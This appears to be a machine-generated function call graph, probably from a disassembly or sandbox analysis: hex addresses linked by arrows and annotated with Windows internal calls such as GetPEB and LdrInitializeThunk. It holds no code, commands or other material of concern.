17399->17401 17401->17382 17401->17399 18029 17d2dcf 17401->18029 17404 17cfd3a 17403->17404 17406 17cfd31 __cftof 17403->17406 17405 17a7608 207 API calls 17404->17405 17404->17406 17405->17406 17406->17327 17408 17cfdba GetPEB 17407->17408 17410 17cfdcc 17407->17410 17409 17b4620 206 API calls 17408->17409 17409->17410 17411 17a76e2 207 API calls 17410->17411 17412 17cfdfc 17410->17412 17411->17412 17412->17333 17414 17b0074 17413->17414 17415 17b009d GetPEB 17414->17415 17420 17b00f8 __cftof 17414->17420 17416 17fc01b 17415->17416 17418 17b00d0 17415->17418 17417 17fc024 GetPEB 17416->17417 17416->17418 17417->17418 17419 17b0109 RtlDebugPrintTimes 17418->17419 17418->17420 17419->17420 17420->17335 17422 17d2e32 17421->17422 17424 17a6dbf 17422->17424 17435 17c1520 17422->17435 17424->17344 17426 179db6d 17425->17426 17427 179db91 17425->17427 17426->17427 17469 179db40 GetPEB 17426->17469 17427->17346 17436 17c1547 17435->17436 17450 17c1554 __cftof 17435->17450 17437 17c1584 GetPEB 17436->17437 17436->17450 17439 17c15a3 17437->17439 17446 17c161a 17437->17446 17438 17c15db GetPEB 17440 17c15f6 17438->17440 17441 17ee311 17438->17441 17439->17438 17451 17c1624 17439->17451 17443 17ee32a GetPEB 17440->17443 17440->17450 17441->17440 17442 17ee31a GetPEB 17441->17442 17442->17440 17445 17ee33d 17443->17445 17443->17450 17447 17b7d50 GetPEB 17445->17447 17446->17438 17448 17ee357 17447->17448 17449 17ee35b GetPEB 17448->17449 17448->17450 17449->17450 17450->17424 17456 17c16e0 17451->17456 17453 17c1691 17453->17446 17455 17c1630 17455->17453 17463 17ca185 17455->17463 17457 17c16ed 17456->17457 17458 17c16f1 17457->17458 17459 17c16f3 GetPEB 17457->17459 17458->17455 17459->17458 17460 17c1700 17459->17460 17461 17b4620 205 API calls 17460->17461 17462 17c170c 17461->17462 17462->17455 17464 17ca1a0 17463->17464 17465 17ca192 17463->17465 17464->17465 17466 17ca1b0 GetPEB 17464->17466 17465->17453 17467 17b77f0 205 API calls 17466->17467 17468 17ca1c1 17467->17468 17468->17453 17470 17b4620 206 API calls 17469->17470 17471 179db52 17470->17471 17471->17427 17472 179e7b0 17471->17472 17473 179e7ce 17472->17473 17474 179e7e0 17472->17474 17475 179e7e8 17473->17475 17529 17a3d34 17473->17529 17474->17475 17479 179b150 __cftof 2 API calls 17474->17479 17477 179e7f6 17475->17477 17595 179dca4 17475->17595 17481 179e8b0 213 API calls 17477->17481 17489 179e818 17477->17489 17490 179db87 17477->17490 17479->17475 17480 179e84d 17484 179e876 17480->17484 17487 179e8b0 213 API calls 17480->17487 17480->17490 17482 179e80b 17481->17482 17616 179e9ed 17482->17616 17483 179e8b0 213 API calls 17486 179e840 17483->17486 17484->17490 17493 179e8b0 213 API calls 17484->17493 17491 179e9ed 213 API calls 17486->17491 17488 179e86c 17487->17488 17636 17a6ffd 17488->17636 17489->17480 17489->17483 17489->17490 17490->17427 17496 179e8b0 17490->17496 17491->17480 17494 179e887 17493->17494 17495 17a6ffd 225 API calls 17494->17495 17495->17490 17497 17f57a2 17496->17497 17498 179e8c9 17496->17498 17498->17497 17500 17f565e GetPEB 17498->17500 17501 179e8e9 17498->17501 17499 179e8f2 17502 179e8f7 17499->17502 17506 17f569c GetPEB 17499->17506 17504 17b77f0 206 API calls 17500->17504 17501->17499 17503 17f567d GetPEB 17501->17503 17508 17f56bb GetPEB 17502->17508 17509 179e8fc 17502->17509 17505 17b77f0 206 API calls 17503->17505 17504->17501 17505->17499 17507 17b77f0 206 API calls 17506->17507 17507->17502 17510 17b77f0 206 API calls 17508->17510 17512 179e901 17509->17512 17930 17a76e2 17509->17930 17510->17509 17514 17a76e2 207 API calls 17512->17514 17515 179e906 17512->17515 17514->17515 17517 17a76e2 207 API calls 17515->17517 17518 179e90f 17515->17518 17517->17518 17519 17a76e2 207 API calls 17518->17519 17520 179e917 17518->17520 17519->17520 17530 17a3d6c 17529->17530 17531 17f8213 17529->17531 17649 17a1b8f 17530->17649 17534 17f822b GetPEB 17531->17534 17560 17a4068 17531->17560 17536 17b77f0 206 API calls 17534->17536 17535 17a3d89 17537 17a1b8f 208 API calls 17535->17537 17536->17560 17538 17a3d9e 17537->17538 17539 17a3dba 17538->17539 17540 17a3da2 GetPEB 17538->17540 17542 17a1b8f 208 API calls 17539->17542 17541 17b77f0 206 API calls 17540->17541 17541->17539 17543 17a3dd2 17542->17543 17546 17a3deb GetPEB 17543->17546 17543->17560 17567 17a3e91 17543->17567 17544 17a407a 17548 17a4085 17544->17548 17551 17f8363 GetPEB 17544->17551 17545 17f8344 GetPEB 17549 17b77f0 206 API calls 17545->17549 17552 17b4620 206 API calls 17546->17552 17547 17a1b8f 208 API calls 17548->17474 17549->17544 17553 17b77f0 206 API calls 17551->17553 17553->17548 17560->17544 17560->17545 17567->17547 17599 179dcfd 17595->17599 17613 179dd6f 17595->17613 17596 179dd47 17597 179e8b0 213 API calls 17596->17597 17598 179dd52 17597->17598 17695 179dbb1 17598->17695 17599->17596 17600 179dfd0 17599->17600 17679 179e620 17599->17679 17604 179e8b0 213 API calls 17600->17604 17612 179dfd6 __cftof 17600->17612 17602 17f4ff2 17602->17602 17604->17612 17605 179dfae 17609 179dfc2 17605->17609 17716 17d95d0 LdrInitializeThunk 17605->17716 17717 179e009 17609->17717 17612->17477 17613->17600 17613->17602 17613->17605 17613->17609 17702 179f018 17613->17702 17710 179e375 17613->17710 17715 17d95d0 LdrInitializeThunk 17613->17715 17618 179ea1c 17616->17618 17631 17f5850 17616->17631 17619 17f57ac 17618->17619 17620 179ea7f 17618->17620 17618->17631 17635 179eb95 17619->17635 17847 17d95d0 LdrInitializeThunk 17619->17847 17833 179f108 17620->17833 17622 17f586a 17623 17f5888 GetPEB 17622->17623 17624 179ebd7 17622->17624 17626 17b77f0 206 API calls 17623->17626 17624->17489 17625 179eba7 17629 179ebb2 17625->17629 17625->17631 17626->17624 17629->17622 17632 179ebce 17629->17632 17848 17d95d0 LdrInitializeThunk 17631->17848 17632->17624 17849 179f2f0 17632->17849 17634 179ea92 17634->17631 17634->17635 17839 179f1e4 17634->17839 17635->17625 17846 17d95d0 LdrInitializeThunk 17635->17846 17637 17a7009 17636->17637 17639 17d2e1c 211 API calls 17637->17639 17640 17a7085 17637->17640 17643 17a703d 17637->17643 17641 17a7051 17639->17641 17645 17a7095 17640->17645 17885 17a7608 17640->17885 17644 17aeef0 206 API calls 17641->17644 17643->17484 17646 17a705b 17644->17646 17647 17f93c6 17645->17647 17882 17a70d6 17645->17882 17646->17640 17646->17645 17853 179ec9b 17646->17853 17654 17a1ba9 17649->17654 17656 17a1c05 17649->17656 17650 17f701a GetPEB 17651 17b77f0 206 API calls 17650->17651 17652 17a1c21 17651->17652 17652->17531 17652->17535 17653 17a1bf4 GetPEB 17655 17b4620 206 API calls 17653->17655 17654->17652 17654->17653 17654->17656 17655->17656 17656->17650 17656->17652 17680 17f5503 17679->17680 17681 179e644 17679->17681 17681->17680 17736 179f358 17681->17736 17683 179e661 17684 179e715 17683->17684 17686 179e70b 17683->17686 17692 179f018 208 API calls 17683->17692 17685 179e725 17684->17685 17741 17d95d0 LdrInitializeThunk 17684->17741 17688 179e729 GetPEB 17685->17688 17689 179e73b 17685->17689 17686->17684 17691 17a43c0 207 API calls 17686->17691 17690 17b77f0 206 API calls 17688->17690 17689->17596 17690->17689 17693 17f54a7 17691->17693 17692->17686 17693->17684 17694 17a43c0 207 API calls 17693->17694 17694->17684 17742 17a766d 17695->17742 17698 179dbf1 17699 179dc05 17698->17699 17700 17a766d 207 API calls 17699->17700 17703 179f035 17702->17703 17704 179f04f GetPEB 17703->17704 17706 179f0d0 17703->17706 17705 17b4620 206 API calls 17704->17705 17708 179f060 __cftof 17705->17708 17706->17613 17707 179f0bf GetPEB 17709 17b77f0 206 API calls 17707->17709 17708->17706 17708->17707 17709->17706 17747 179e584 17710->17747 17712 179e3a3 17714 179e3e5 __cftof 17712->17714 17753 179e746 17712->17753 17714->17613 17715->17613 17716->17609 17718 179e05d 17717->17718 17721 17f4ff7 17718->17721 17787 17a3bf4 17718->17787 17722 179e203 __cftof 17721->17722 17724 179f358 207 API calls 17721->17724 17722->17600 17723 179e0ae 17729 179e0f4 17723->17729 17799 179e2f0 17723->17799 17725 17f5026 17724->17725 17725->17722 17809 17a3b30 17725->17809 17803 179e216 17729->17803 17730 17f5060 17730->17729 17732 179f395 210 API calls 17730->17732 17732->17729 17734 179e132 17734->17722 17737 179f370 17736->17737 17738 179f379 GetPEB 17737->17738 17740 179f38c 17737->17740 17739 17b4620 206 API calls 17738->17739 17739->17740 17740->17683 17741->17685 17744 17a7687 17742->17744 17743 179dbcf 17743->17613 17743->17698 17744->17743 17745 17a76c2 GetPEB 17744->17745 17746 17b4620 206 API calls 17745->17746 17746->17743 17748 179e5a6 17747->17748 17749 17a43c0 207 API calls 17748->17749 17751 179e5b3 17749->17751 17750 179e60e 17750->17712 17751->17750 17765 179f395 17751->17765 17754 179e77b 17753->17754 17755 179f018 208 API calls 17754->17755 17766 179f3ba 17765->17766 17769 179f42e 17765->17769 17767 179f358 207 API calls 17766->17767 17766->17769 17768 179f3ca 17767->17768 17768->17769 17776 17a2eb0 17768->17776 17769->17750 17788 17a3c1f 17787->17788 17790 179e098 17787->17790 17789 17a3ca5 GetPEB 17788->17789 17788->17790 17793 17a3cb9 17788->17793 17791 17b4620 206 API calls 17789->17791 17790->17721 17790->17723 17791->17793 17792 17a3cd1 GetPEB 17795 17b77f0 206 API calls 17792->17795 17793->17790 17793->17792 17794 17a3b30 208 API calls 17793->17794 17796 17a3d0f 17794->17796 17795->17790 17796->17792 17815 17a37ee 17796->17815 17800 179e303 17799->17800 17801 179e31e 17799->17801 17800->17801 17802 17a3b30 210 API calls 17800->17802 17801->17729 17802->17801 17804 179e2cd __cftof 17803->17804 17805 179e264 17803->17805 17804->17734 17805->17804 17806 17f52b5 17805->17806 17807 17a37ee 210 API calls 17805->17807 17806->17804 17807->17805 17810 17a3b47 17809->17810 17814 17a3b7b 17809->17814 17811 17a3b6d 17810->17811 17812 17a3bf4 210 API calls 17810->17812 17810->17814 17811->17814 17822 17a4720 17811->17822 17812->17811 17814->17730 17816 17a3844 17815->17816 17820 17a380f 17815->17820 17816->17792 17820->17816 17834 179f11a 17833->17834 17837 179f131 17833->17837 17835 179f1b9 2 API calls 17834->17835 17836 179f11f 17835->17836 17836->17837 17838 179f150 209 API calls 17836->17838 17837->17634 17838->17837 17843 179f2b1 __cftof 17839->17843 17844 179f232 17839->17844 17840 179f29b 17840->17843 17841 179f46e 207 API calls 17841->17844 17843->17635 17844->17840 17844->17841 17844->17843 17845 179f2f0 207 API calls 17844->17845 17845->17844 17846->17625 17847->17635 17848->17622 17850 179f2fe 17849->17850 17883 17aeb70 3 API calls 17882->17883 17884 17a70e0 17883->17884 17884->17643 17886 17a7620 17885->17886 17887 17a766d 207 API calls 17886->17887 17888 17a7632 17887->17888 17888->17645 17931 17a76fd 17930->17931 17932 17a76e6 17930->17932 17931->17512 17932->17931 17933 17a76ec GetPEB 17932->17933 17934 17b77f0 206 API calls 17933->17934 17934->17931 17936 17f937c 17935->17936 17941 17a6e2f 17935->17941 17937 17a6f60 18037 17d35b1 17937->18037 17939 17a6eee 17939->17368 17939->17372 17939->17382 17940 17a6fcb 17940->17939 17943 179e9ed 213 API calls 17940->17943 17941->17936 17941->17937 17942 17a76e2 207 API calls 17941->17942 17945 17a6ec8 17941->17945 17942->17945 17944 17f935f 17943->17944 17944->17939 17947 17cfd9b 208 API calls 17944->17947 17945->17937 17945->17939 17948 17a76e2 207 API calls 17945->17948 17947->17939 17950 17f9314 17948->17950 17949 17cfd9b 208 API calls 17949->17940 17950->17937 17951 17a76e2 207 API calls 17950->17951 17951->17937 17953 17a75db 17952->17953 17954 17a7355 17952->17954 17953->17954 17955 17a7608 207 API calls 17953->17955 17954->17368 17954->17382 17954->17387 17955->17954 17957 17f7f3e 17956->17957 17959 17a34f5 17956->17959 17958 17a357c GetPEB 17960 17b4620 206 API calls 17958->17960 17959->17957 17959->17958 17961 17a75ce 207 API calls 17959->17961 17972 17a3594 17959->17972 17960->17972 17962 17a3570 17961->17962 17962->17958 17989 17a3792 17962->17989 17963 17a37bb 17966 17a37c2 GetPEB 17963->17966 17967 17a37d4 17963->17967 17964 17a369e 18052 17a49b0 17964->18052 17965 17a76e2 207 API calls 17965->17963 17969 17b77f0 206 API calls 17966->17969 17967->17377 17969->17967 17971 17a3133 210 API calls 17971->17972 17972->17971 17975 17a40be 213 API calls 17972->17975 17978 17a35ae 17972->17978 17972->17989 17973 17a3b30 210 API calls 17976 17a36d8 17973->17976 17974 17a35b9 17974->17964 17984 17a3722 17974->17984 18041 17a3133 17974->18041 18045 17a40be 17974->18045 17975->17972 17976->17989 17977 17a3133 210 API calls 17977->17978 17978->17974 17978->17977 17980 17a40be 213 API calls 17978->17980 17978->17989 17980->17978 17984->17989 18058 17a1f8a 17984->18058 17989->17963 17989->17965 17991 17f7d57 17990->17991 17992 17a31f6 17990->17992 17992->17991 17993 17a3211 GetPEB 17992->17993 17994 17b4620 206 API calls 17993->17994 17995 17a3226 17994->17995 17995->17991 17996 17a49b0 256 API calls 17995->17996 17997 17a324a 17996->17997 17997->17991 17998 17a3b30 210 API calls 17997->17998 17999 17a3260 17998->17999 17999->17991 18000 17a3358 GetPEB 17999->18000 18002 17a3133 210 API calls 17999->18002 18004 17a338b 210 API calls 17999->18004 18005 17a40be 213 API calls 17999->18005 18001 17b77f0 206 API calls 18000->18001 18003 17a3369 18001->18003 18002->17999 18003->17388 18004->17999 18005->17999 18007 17a9d3a 18006->18007 18009 17a73ef 18007->18009 18080 17a9e69 18007->18080 18009->17392 18009->17401 18022 17a2347 18009->18022 18011 17f7cdc 18010->18011 18012 17a2fb5 18010->18012 18017 17a37ee 210 API calls 18011->18017 18012->18011 18013 17a2fc6 GetPEB 18012->18013 18014 17b4620 206 API calls 18013->18014 18015 17a2fdc 18014->18015 18015->18011 18016 17a307f GetPEB 18015->18016 18021 17a3133 210 API calls 18015->18021 18018 17b77f0 206 API calls 18016->18018 18019 17f7cfb 18017->18019 18020 17a3090 18018->18020 18019->18019 18020->17401 18021->18015 18024 17a237e 18022->18024 18025 17a25d5 __cftof 18024->18025 18026 17a3b30 210 API calls 18024->18026 18027 17a2537 18024->18027 18102 17a27b0 18024->18102 18025->17392 18026->18024 18027->18025 18108 17a2660 18027->18108 18030 17d2ddc 18029->18030 18031 17d2e0f 18029->18031 18030->18031 18032 17d2e1c 211 API calls 18030->18032 18031->17401 18033 17d2deb 18032->18033 18034 17aeef0 206 API calls 18033->18034 18035 17d2df6 18034->18035 18036 17aeb70 3 API calls 18035->18036 18036->18031 18038 17a6f91 18037->18038 18039 17d35ca 18037->18039 18038->17939 18038->17940 18038->17949 18039->18038 18040 17a6ffd 225 API calls 18039->18040 18040->18038 18042 17a3145 18041->18042 18044 17a3181 18041->18044 18043 17a3b30 210 API calls 18042->18043 18042->18044 18043->18044 18044->17974 18046 17f8384 18045->18046 18047 17a40d8 18045->18047 18047->18046 18072 17a4172 18047->18072 18049 17a4107 18053 17a49cd 18052->18053 18055 17a36bd 18052->18055 18054 17a6d90 256 API calls 18053->18054 18056 17a49d7 18053->18056 18054->18056 18055->17973 18055->17989 18056->18055 18057 179e620 211 API calls 18056->18057 18057->18055 18060 17a1fd0 18058->18060 18059 17f72c5 18060->18059 18061 17a75ce 207 API calls 18060->18061 18069 17a2023 18061->18069 18073 17a418d 18072->18073 18075 17a41c8 18072->18075 18074 17a43c0 207 API calls 18073->18074 18073->18075 18074->18075 18075->18049 18081 17a9edf __cftof 18080->18081 18082 17a9ea2 18080->18082 18081->18007 18082->18081 18083 17a9eda 18082->18083 18084 17a9eff 18082->18084 18087 17a9f0d 18083->18087 18091 17a14a9 18084->18091 18088 17a9f42 18087->18088 18090 17a9f64 __cftof 18087->18090 18089 17a43c0 207 API calls 18088->18089 18088->18090 18089->18090 18090->18081 18092 17f6968 18091->18092 18093 17a14c4 18091->18093 18093->18092 18094 17a14d7 GetPEB 18093->18094 18095 17b4620 206 API calls 18094->18095 18096 17a14f2 18095->18096 18097 17a3b30 210 API calls 18096->18097 18101 17a1508 __cftof 18096->18101 18097->18101 18098 17a1558 GetPEB 18099 17b77f0 206 API calls 18098->18099 18100 17a156c 18099->18100 18100->18081 18101->18098 18103 17a27bc 18102->18103 18104 17b3a1c 207 API calls 18103->18104 18105 17a27cd 18103->18105 18104->18105 18107 17a2839 18105->18107 18112 17a2862 18105->18112 18107->18024 18109 17a268a 18108->18109 18110 17a26b6 __cftof 18109->18110 18117 17b1f30 18109->18117 18110->18025 18113 17f765a 18112->18113 18114 17a286c 18112->18114 18113->18114 18115 179ad30 207 API calls 18113->18115 18114->18107 18116 17f766c 18115->18116 18116->18107 18118 17b1f72 18117->18118 18120 17b2054 18117->18120 18119 17b3a1c 207 API calls 18118->18119 18118->18120 18121 17b1f9a 18118->18121 18119->18121 18120->18110 18121->18120 18123 17b2086 18121->18123 18124 17b2090 18123->18124 18125 179ad30 207 API calls 18124->18125 18126 17b2098 18124->18126 18125->18126 18126->18120 18157 1795050 GetPEB 18180 179519e 18157->18180 18159 17b4620 206 API calls 18161 1795076 18159->18161 18160 17b6e30 207 API calls 18160->18161 18161->18159 18161->18160 18163 17f0c4b 18161->18163 18164 17f0c2b GetPEB 18161->18164 18165 17950f1 18161->18165 18167 17b77f0 206 API calls 18161->18167 18172 179518f 18161->18172 18162 17b77f0 206 API calls 18162->18172 18163->18162 18164->18161 18164->18163 18165->18163 18166 1795109 18165->18166 18192 17cf0bf 18166->18192 18167->18161 18169 179511c 18170 17b77f0 206 API calls 18169->18170 18171 179512d 18170->18171 18171->18172 18173 17aeef0 206 API calls 18171->18173 18174 179513b 18173->18174 18175 17aeb70 3 API calls 18174->18175 18176 1795169 18175->18176 18176->18172 18201 17d95d0 LdrInitializeThunk 18176->18201 18178 179517e GetPEB 18179 17b77f0 206 API calls 18178->18179 18179->18172 18181 17952a5 220 API calls 18180->18181 18182 17951b4 18181->18182 18183 17951be 18182->18183 18184 17f0c96 GetPEB 18182->18184 18186 17aeb70 3 API calls 18183->18186 18187 17951f1 18183->18187 18184->18183 18185 17951fe 18185->18161 18186->18187 18187->18185 18202 17d95d0 LdrInitializeThunk 18187->18202 18189 17f0cf6 GetPEB 18190 17b77f0 206 API calls 18189->18190 18191 17f0d08 18190->18191 18191->18191 18193 17b4120 218 API calls 18192->18193 18194 17cf0e5 18193->18194 18195 17cf139 GetPEB 18194->18195 18200 17cf18d __cftof 18194->18200 18196 17b77f0 206 API calls 18195->18196 18197 17cf150 18196->18197 18198 17cf16f GetPEB 18197->18198 18199 17b4620 206 API calls 18198->18199 18199->18200 18200->18169 18201->18178 18202->18189 18930 1795210 18931 17952a5 220 API calls 18930->18931 18932 1795220 18931->18932 18933 17f0d0d GetPEB 18932->18933 18934 179522a 18932->18934 18938 17f0d22 18933->18938 18935 17f0d5c 18934->18935 18939 179524a 18934->18939 18936 17f0d68 18935->18936 18937 1795256 __cftof 18935->18937 18940 17f0d6c 18936->18940 18941 17f0d78 18936->18941 18947 179526b 18937->18947 18949 17aeb70 3 API calls 18937->18949 18942 17f0d26 18938->18942 18945 17f0d32 18938->18945 18939->18937 18939->18938 18943 17aeb70 3 API calls 18940->18943 18951 1795278 18941->18951 18960 17d95d0 LdrInitializeThunk 18941->18960 18944 17aeb70 3 API calls 18942->18944 18943->18951 18944->18951 18945->18951 18959 17d95d0 LdrInitializeThunk 18945->18959 18947->18951 18961 17d95d0 LdrInitializeThunk 18947->18961 18949->18947 18950 17f0d43 GetPEB 18953 17b77f0 206 API calls 18950->18953 18952 17f0d89 GetPEB 18955 17b77f0 206 API calls 18952->18955 18953->18951 18955->18951 18956 17f0db9 GetPEB 18957 17b77f0 206 API calls 18956->18957 18958 17f0dca 18957->18958 18958->18958 18959->18950 18960->18952 18961->18956 18962 1792c13 18963 1792c28 18962->18963 18964 1792c4c 18962->18964 18966 17bf86d 18963->18966 18968 17bf879 18966->18968 18967 18047c9 18968->18967 18969 17bf89e GetPEB 18968->18969 18969->18967 18971 17bf8b1 18969->18971 18973 17bf8e7 18971->18973 18987 17c3e70 18971->18987 18972 17bf900 18972->18973 18974 17bf9b0 18972->18974 18975 17bf930 18972->18975 18986 17bf975 18972->18986 18973->18964 18979 17c5aa0 3 API calls 18974->18979 18974->18986 18976 17bf93d 18975->18976 18977 180479f 18975->18977 18993 17c5aa0 18976->18993 18978 17c5aa0 3 API calls 18977->18978 18978->18986 18981 17bf9c3 18979->18981 19005 17995f0 18981->19005 18984 1799100 4 API calls 18984->18973 18986->18973 18986->18984 18988 17c3e98 18987->18988 18989 17c3e7c 18987->18989 18988->18972 18989->18988 18990 17c3e82 GetPEB 18989->18990 18990->18988 18991 17c3e91 18990->18991 19013 17c37eb 18991->19013 18994 17c5ab1 18993->18994 19000 17bf959 18993->19000 18995 17c5ab7 GetPEB 18994->18995 18994->19000 18996 17c5ac6 18995->18996 18995->19000 18997 17b7d50 GetPEB 18996->18997 18998 17c5adb 18997->18998 18999 18071d5 GetPEB 18998->18999 18998->19000 18999->19000 19001 17d5c70 19000->19001 19002 17d5c7c 19001->19002 19004 17d5c91 19001->19004 19003 17d5c82 GetPEB 19002->19003 19002->19004 19003->19004 19004->18986 19006 1799601 19005->19006 19011 1799635 19005->19011 19007 1799607 GetPEB 19006->19007 19006->19011 19008 1799616 19007->19008 19007->19011 19009 17b7d50 GetPEB 19008->19009 19010 179962d 19009->19010 19010->19011 19012 17f3a81 GetPEB 19010->19012 19011->18986 19012->19011 19043 17ed08c 19013->19043 19015 17c37f7 GetPEB 19016 17c381c 19015->19016 19017 17c3824 GetPEB 19016->19017 19018 180615c 19016->19018 19017->19018 19019 17c3844 GetPEB 19017->19019 19018->19019 19020 17b4620 206 API calls 19019->19020 19021 17c3865 19020->19021 19022 17c387c GetPEB 19021->19022 19037 17c3afa 19021->19037 19023 17b4620 206 API calls 19022->19023 19024 17c38a2 19023->19024 19026 17c38f4 GetPEB 19024->19026 19024->19037 19025 180627f GetPEB 19027 17b4620 206 API calls 19026->19027 19028 17c391b 19027->19028 19029 17c3929 GetPEB 19028->19029 19028->19037 19030 17b4620 206 API calls 19029->19030 19031 17c3952 19030->19031 19031->19037 19044 17c3b7a GetPEB 19031->19044 19033 17c3ad9 19064 17c3b5a 19033->19064 19037->19025 19041 17c3b02 19037->19041 19039 17c3978 19039->19033 19039->19037 19042 17c3a7a 19039->19042 19051 17c196e 19039->19051 19041->18988 19042->19041 19058 17c3b48 19042->19058 19043->19015 19045 17b4620 206 API calls 19044->19045 19047 17c3bb5 19045->19047 19046 1806298 19047->19046 19048 17c3c1b GetPEB 19047->19048 19049 17b77f0 206 API calls 19048->19049 19050 17c3c35 19049->19050 19050->19039 19078 17c18b9 19051->19078 19059 17c3b51 19058->19059 19065 17c3b63 19064->19065 19079 17c18eb 19078->19079 16996 17d95d0 LdrInitializeThunk 15968 179f108 15969 179f11a 15968->15969 15972 179f131 15968->15972 15974 179f1b9 15969->15974 15975 179f1c8 15974->15975 15976 179f11f 15974->15976 15983 179f340 15975->15983 15976->15972 15978 179f150 15976->15978 15990 17aa3e0 15978->15990 15980 179f164 15981 179f1a2 15980->15981 15999 17b2400 15980->15999 15981->15972 15988 17b7d50 GetPEB 15983->15988 15986 179f34d 15986->15976 15987 17f5ca4 GetPEB 15987->15976 15989 179f345 15988->15989 15989->15986 15989->15987 16003 17d9710 LdrInitializeThunk 15990->16003 15992 17aa409 15997 17aa474 __cftof 15992->15997 16004 17b3a1c GetPEB 15992->16004 15994 17aa436 15994->15997 16007 17aa500 15994->16007 15996 17aa46e 15996->15997 15998 17b2400 207 API calls 15996->15998 15997->15980 15998->15997 16000 17b240f 15999->16000 16001 17b2417 15999->16001 16961 179ad30 GetPEB 16000->16961 16001->15981 16003->15992 16017 17b4620 16004->16017 16009 17aa528 16007->16009 16008 17fa2c0 16951 17e7110 16008->16951 16009->16008 16940 17e71a0 16009->16940 16014 17aa56c 16016 17aa61a __cftof 16014->16016 16947 17cf6e0 16014->16947 16016->15996 16018 17b4635 16017->16018 16019 17fe2b9 16017->16019 16018->16019 16022 17b4670 16018->16022 16023 17b46a1 16022->16023 16024 17fe2e9 16022->16024 16027 17b474a 16023->16027 16031 17b4761 GetPEB 16023->16031 16046 17b4880 16023->16046 16026 17fe334 16024->16026 16034 17fe391 16024->16034 16032 179ccc0 2 API calls 16026->16032 16027->16031 16041 17b4757 16027->16041 16074 17b5600 16027->16074 16029 17b47e9 16030 17b47f6 16029->16030 16029->16041 16163 179ccc0 16030->16163 16036 17fe49e 16031->16036 16037 17b4775 16031->16037 16044 17b3a34 16032->16044 16171 17b7d30 16034->16171 16036->16037 16039 17fe4af GetPEB 16036->16039 16040 17fe4c2 GetPEB 16037->16040 16045 17b4783 16037->16045 16039->16037 16040->16045 16041->16031 16041->16036 16175 17b77f0 16041->16175 16042 17fe596 GetPEB 16042->16044 16044->15994 16045->16042 16045->16044 16066 17b48aa 16046->16066 16048 17b7d50 GetPEB 16048->16066 16049 17b502d GetPEB 16049->16066 16050 17fe5e4 GetPEB 16051 17fe5f7 GetPEB 16050->16051 16051->16066 16052 17fe680 GetPEB 16052->16066 16053 17b504c GetPEB 16053->16066 16055 17fe69c GetPEB 16055->16066 16056 17b50cb GetPEB 16056->16066 16057 17fe6af GetPEB 16057->16066 16058 17b4ada 16058->16027 16059 17fe897 GetPEB 16059->16066 16060 17d4d51 GetPEB 16060->16066 16061 17fe8aa GetPEB 16061->16066 16063 17b8d76 GetPEB GetPEB GetPEB GetPEB GetPEB 16063->16066 16064 17b555d 16250 17b97ed 16064->16250 16066->16048 16066->16049 16066->16050 16066->16051 16066->16052 16066->16053 16066->16055 16066->16056 16066->16057 16066->16058 16066->16059 16066->16060 16066->16061 16066->16063 16066->16064 16070 17b4f20 GetPEB 16066->16070 16071 17feb05 GetPEB 16066->16071 16072 17feb18 GetPEB 16066->16072 16073 17d5a69 GetPEB 16066->16073 16200 17af370 16066->16200 16211 17c65a0 16066->16211 16227 17c1164 16066->16227 16233 17ce830 16066->16233 16238 179774a 16066->16238 16243 17cf3fd 16066->16243 16070->16066 16071->16066 16072->16066 16073->16066 16075 17b567f 16074->16075 16078 17b672c 16074->16078 16076 17b56b9 16075->16076 16077 17b64d1 GetPEB 16075->16077 16075->16078 16079 17b5711 16076->16079 16080 17b56df 16076->16080 16081 17b6856 16076->16081 16077->16076 16083 17febee 16078->16083 16160 17b57a3 16078->16160 16082 17b69d3 16079->16082 16091 17b571d 16079->16091 16080->16079 16084 17b69cc 16080->16084 16081->16083 16087 17b6875 16081->16087 16081->16160 16086 17c1164 2 API calls 16082->16086 16150 17ff4cd 16082->16150 16088 179ccc0 2 API calls 16083->16088 16430 17c5640 16084->16430 16089 17b69f3 16086->16089 16090 17aeef0 187 API calls 16087->16090 16151 17b5fc0 16088->16151 16436 17d9660 LdrInitializeThunk 16089->16436 16090->16160 16091->16160 16426 17cf4a7 16091->16426 16092 17ff598 GetPEB 16097 17b5fec 16092->16097 16096 17b6a4d 16096->16151 16437 17d9660 LdrInitializeThunk 16096->16437 16097->16029 16099 179ccc0 2 API calls 16099->16151 16100 17fee5e GetPEB 16103 17fee6b GetPEB 16100->16103 16100->16160 16102 17ba229 13 API calls 16102->16160 16547 179b150 16103->16547 16104 17b6a7d 16108 17b7d50 GetPEB 16104->16108 16104->16150 16105 17b6c0e 16438 17ba309 16105->16438 16107 179b150 GetPEB GetPEB __cftof 16107->16160 16111 17b6ace 16108->16111 16109 17ba309 58 API calls 16109->16151 16115 17ff406 GetPEB 16111->16115 16116 17b6ad6 16111->16116 16112 179b150 __cftof 2 API calls 16117 17feeaf GetPEB 16112->16117 16113 17fecbe 16113->16099 16114 17b67b9 16118 17b67f7 16114->16118 16119 17ff3b1 GetPEB 16114->16119 16114->16151 16121 17ff419 GetPEB 16115->16121 16116->16121 16122 17b6ae4 16116->16122 16117->16160 16126 17b681a GetPEB 16118->16126 16118->16151 16119->16151 16120 17b622f 16120->16029 16121->16122 16124 17b7d50 GetPEB 16122->16124 16123 17b5f74 16123->16114 16131 17b6dc3 16123->16131 16123->16151 16125 17b6ae9 16124->16125 16128 17b6af1 16125->16128 16129 17ff440 GetPEB 16125->16129 16126->16151 16132 17ff453 GetPEB 16128->16132 16145 17b6aff 16128->16145 16129->16132 16130 17ff2de 16134 179ccc0 2 API calls 16130->16134 16137 1794dc0 3 API calls 16131->16137 16131->16151 16133 17ff466 16132->16133 16132->16145 16136 17b7d50 GetPEB 16133->16136 16134->16151 16135 17b7d50 GetPEB 16138 17b6b04 16135->16138 16139 17ff46b 16136->16139 16137->16151 16141 17b6b0c 16138->16141 16142 17ff4a1 GetPEB 16138->16142 16139->16145 16146 17ff46f GetPEB 16139->16146 16143 17b6b1a 16141->16143 16144 17ff4b4 16141->16144 16142->16144 16148 17b6b27 GetPEB 16143->16148 16143->16150 16149 17b7d50 GetPEB 16144->16149 16145->16135 16146->16145 16147 17ba309 58 API calls 16147->16160 16148->16150 16148->16151 16150->16092 16150->16097 16151->16150 16380 17b6df6 16151->16380 16153 17ff0dc GetPEB 16156 17ff0e9 GetPEB 16153->16156 16153->16160 16154 17b68ac 16154->16109 16158 179b150 __cftof 2 API calls 16156->16158 16157 17fee09 16159 17ba309 58 API calls 16157->16159 16158->16160 16159->16151 16160->16100 16160->16102 16160->16105 16160->16107 16160->16112 16160->16113 16160->16114 16160->16120 16160->16123 16160->16130 16160->16147 16160->16151 16160->16153 16160->16154 16160->16157 